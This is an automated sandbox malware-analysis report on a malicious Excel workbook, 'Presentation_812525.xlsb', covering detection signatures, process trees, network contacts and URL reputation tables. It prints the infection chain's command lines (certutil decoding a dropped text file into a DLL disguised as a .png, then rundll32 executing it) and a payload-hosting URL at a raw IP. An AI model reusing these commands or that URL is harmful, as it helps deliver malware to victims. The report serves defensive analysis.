Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://www.verizonmedia.com/policies/us/en/verizonmedia/privacy/adinfo/index.html
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://www.verizonmedia.com/policies/us/en/verizonmedia/privacy/adinfo/index.html&quot;
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://www.verizonmedia.com/policies/us/en/verizonmedia/privacy/index.html
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://www.verizonmedia.com/policies/us/en/verizonmedia/terms/otos/index.html
Source: 9J0CLPJO.htm.6.drString found in binary or memory: https://www.yahoo.com/
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drString found in binary or memory: https://yahoo.uservoice.com/forums/341361-yahoo-home?browser=ie&amp;bucket=FPTRELUG105&amp;os=window
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownHTTPS traffic detected: 74.6.143.26:443 -> 192.168.2.3:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 87.248.100.215:443 -> 192.168.2.3:49709 version: TLS 1.2

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: C:\Users\Public\94101.png2, type: DROPPEDMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 8Screenshot OCR: Enable editing" from the yellow bar 13 above. 14 15_ Once you have enabled editing, please click
Source: Screenshot number: 8Screenshot OCR: Enable content' ontheyellow barabo:: 20" , a *this document is completely safety to open 21 22 2
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Presentation_812525.xlsbInitial sample: CALL
Source: Presentation_812525.xlsbInitial sample: CALL
Source: C:\Users\Public\94101.png2, type: DROPPEDMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: classification engineClassification label: mal96.expl.evad.winXLSB@11/14@2/4
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3984:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5640:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{60490B27-0950-42C5-96BE-3819E3A7C960} - OProcSessId.datJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\Public\94101.png,In
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\SysWOW64\certutil.exe 'C:\Windows\System32\certutil.exe' -decode C:\Users\Public\94101.txt C:\Users\Public\94101.png2
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\certutil.exe 'C:\Windows\System32\certutil.exe' -decodehex C:\Users\Public\94101.png2 C:\Users\Public\94101.png
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\Public\94101.png,In
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\ProgramData\ioq\ioq.dll,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\certutil.exe 'C:\Windows\System32\certutil.exe' -decode C:\Users\Public\94101.txt C:\Users\Public\94101.png2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\certutil.exe 'C:\Windows\System32\certutil.exe' -decodehex C:\Users\Public\94101.png2 C:\Users\Public\94101.png
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\Public\94101.png,In
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\ProgramData\ioq\ioq.dll,DllRegisterServer
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Presentation_812525.xlsbInitial sample: OLE zip file path = xl/media/image1.png
Source: Presentation_812525.xlsbInitial sample: OLE zip file path = docProps/thumbnail.wmf
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10001C26 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_009032D0 push edx; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00903270 push edx; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_009007B8 push eax; ret
Source: C:\Windows\SysWOW64\certutil.exeFile created: C:\Users\Public\94101.pngJump to dropped file
Source: C:\Windows\SysWOW64\certutil.exeFile created: C:\Users\Public\94101.pngJump to dropped file
Source: C:\Windows\SysWOW64\certutil.exeFile created: C:\Users\Public\94101.pngJump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directoryShow sources
Source: C:\Windows\SysWOW64\certutil.exeFile created: C:\Users\Public\94101.pngJump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Uses certutil -decodeShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\certutil.exe 'C:\Windows\System32\certutil.exe' -decode C:\Users\Public\94101.txt C:\Users\Public\94101.png2
Source: unknownProcess created: C:\Windows\SysWOW64\certutil.exe 'C:\Windows\System32\certutil.exe' -decodehex C:\Users\Public\94101.png2 C:\Users\Public\94101.png
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\certutil.exe 'C:\Windows\System32\certutil.exe' -decode C:\Users\Public\94101.txt C:\Users\Public\94101.png2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\certutil.exe 'C:\Windows\System32\certutil.exe' -decodehex C:\Users\Public\94101.png2 C:\Users\Public\94101.png
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: rundll32.exe, 00000007.00000002.255071756.0000000000900000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: rundll32.exe, 00000007.00000002.255071756.0000000000900000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: rundll32.exe, 00000007.00000002.255071756.0000000000900000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: rundll32.exe, 00000007.00000002.255071756.0000000000900000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10001A64 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10001E5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10001A64 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\rundll32.exeMemory protected: page execute read | page guard

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 74.6.143.26 187
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 172.104.129.156 80
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 87.248.100.215 187
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10001C6B cpuid
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000168B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting1Path InterceptionProcess Injection11Masquerading121OS Credential DumpingSystem Time Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools11LSASS MemorySecurity Software Discovery111Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerRemote System Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting1LSA SecretsSystem Information Discovery13SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRundll321DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 342076 Sample: Presentation_812525.xlsb Startdate: 20/01/2021 Architecture: WINDOWS Score: 96 43 Malicious sample detected (through community Yara rule) 2->43 45 Multi AV Scanner detection for dropped file 2->45 47 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->47 49 4 other signatures 2->49 7 EXCEL.EXE 28 38 2->7         started        process3 dnsIp4 41 192.168.2.1 unknown unknown 7->41 27 C:\Users\user\...\~$Presentation_812525.xlsb, data 7->27 dropped 29 C:\Users\Public\94101.txt, ASCII 7->29 dropped 51 Uses certutil -decode 7->51 53 Document exploit detected (process start blacklist hit) 7->53 12 certutil.exe 2 7->12         started        16 rundll32.exe 16 7->16         started        19 certutil.exe 2 7->19         started        file5 signatures6 process7 dnsIp8 31 C:\Users\Public\94101.png2, ASCII 12->31 dropped 55 Drops PE files to the user root directory 12->55 21 conhost.exe 12->21         started        35 172.104.129.156, 49707, 80 LINODE-APLinodeLLCUS United States 16->35 37 new-fp-shed.wg1.b.yahoo.com 87.248.100.215, 443, 49709 YAHOO-IRDGB United Kingdom 16->37 39 2 other IPs or domains 16->39 57 System process connects to network (likely due to code injection or exploit) 16->57 23 rundll32.exe 16->23         started        33 C:\Users\Public\94101.png, PE32 19->33 dropped 25 conhost.exe 19->25         started        file9 signatures10 process11

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\Public\94101.png36%ReversingLabsWin32.Trojan.Woreflint

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://www.ad.com/?utm_source=yahoo-home&amp;utm_medium=referral&amp;utm_campaign=ad-feedback&quot;0%Avira URL Cloudsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
http://172.104.129.156/campo/o/o0%VirustotalBrowse
http://172.104.129.156/campo/o/o0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%VirustotalBrowse
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.verizonmedia.com/careers0%VirustotalBrowse
https://www.verizonmedia.com/careers0%Avira URL Cloudsafe
http://ocsp.sectigo.com00%URL Reputationsafe
http://ocsp.sectigo.com00%URL Reputationsafe
http://ocsp.sectigo.com00%URL Reputationsafe
http://ocsp.sectigo.com00%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://www.verizonmedia.com/policies/us/en/verizonmedia/terms/otos/index.html0%Avira URL Cloudsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe
https://www.verizonmedia.com/policies/us/en/verizonmedia/privacy/adinfo/index.html0%Avira URL Cloudsafe
https://cortana.ai/api0%URL Reputationsafe
https://cortana.ai/api0%URL Reputationsafe
https://cortana.ai/api0%URL Reputationsafe
https://www.verizonmedia.com/policies/us/en/verizonmedia/privacy/adinfo/index.html&quot;0%Avira URL Cloudsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
new-fp-shed.wg1.b.yahoo.com
87.248.100.215
truefalse
    		high
    yahoo.com
    		74.6.143.26
    		truefalse
      		high
      www.yahoo.com
      		unknown
      		unknownfalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://172.104.129.156/campo/o/otrue
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://shell.suite.office.com:144314A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
          		high
          https://s.yimg.com/nn/lib/metro/g/myy/fallback_grid_0.0.4.css9J0CLPJO.htm.6.drfalse
            		high
            https://autodiscover-s.outlook.com/14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
              		high
              https://s.yimg.com/aaq/fp/css/tdv2-wafer-ntk.NTKDesktop.atomic.ltr.94b956089fc91c2f0a244928a927abc9.9J0CLPJO.htm.6.drfalse
                		high
                https://s.yimg.com/aaq/wf/wf-geolocation-1.2.9.jsrundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drfalse
                  		high
                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                    		high
                    https://cdn.entity.14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                      		high
                      https://s.yimg.com/aaq/fp/css/tdv2-wafer-user-intent.ContentPreference.atomic.ltr.bbf364e334d48eef599J0CLPJO.htm.6.drfalse
                        		high
                        https://aka-cdn.adtechus.com/images/ATCollapse.gifrundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drfalse
                          		high
                          https://rpsticket.partnerservices.getmicrosoftkey.com14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://s.yimg.com/aaq/fp/css/tdv2-wafer-user-intent.rollupDesktop.atomic.ltr.85ffd965befa53ddf87e9a9J0CLPJO.htm.6.drfalse
                            		high
                            https://lookup.onenote.com/lookup/geolocation/v114A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                              		high
                              https://s.yimg.com/aaq/fp/css/tdv2-wafer-header.custom.desktop.2ce65662738d6cd781c23fc340c7205c.css9J0CLPJO.htm.6.drfalse
                                		high
                                https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                                  		high
                                  https://www.ad.com/?utm_source=yahoo-home&amp;utm_medium=referral&amp;utm_campaign=ad-feedback&quot;9J0CLPJO.htm.6.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                                    		high
                                    https://api.aadrm.com/14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://baseball.fantasysports.yahoo.com/b1/signuprundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.drfalse
                                      		high
                                      https://s.yimg.com/aaq/fp/css/tdv2-wafer-stream.custom.desktop.35b4e59342f8c72801c502afb5933cff.css9J0CLPJO.htm.6.drfalse
                                        		high
                                        http://modernizr.com/download/#-touch-cssclasses-teststyles-prefixes9J0CLPJO.htm.6.drfalse
                                          		high
                                          https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                                            		high
                                            https://api.microsoftstream.com/api/14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                                              		high
                                              https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                                                		high
                                                https://cr.office.com14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                                                  		high
                                                  https://s.yimg.com/uu/api/res/1.2/Emg04hx6q7x_kZo7E5_wgA--~B/Zmk9c3RyaW07aD0xOTM7cT05NTt3PTIyMDthcHB9J0CLPJO.htm.6.drfalse
                                                    		high
                                                    https://res.getmicrosoftkey.com/api/redemptionevents14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://s.yimg.com/aaq/cmp/version/3.0.3/cmp.js9J0CLPJO.htm.6.drfalse
                                                      		high
                                                      https://tasks.office.com14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                                                        		high
                                                        https://officeci.azurewebsites.net/api/14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                                                        • 0%, Virustotal, Browse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://store.office.cn/addinstemplate14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://wus2-000.pagecontentsync.14A1215A-380B-45DE-AA00-CCD0BB357790.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
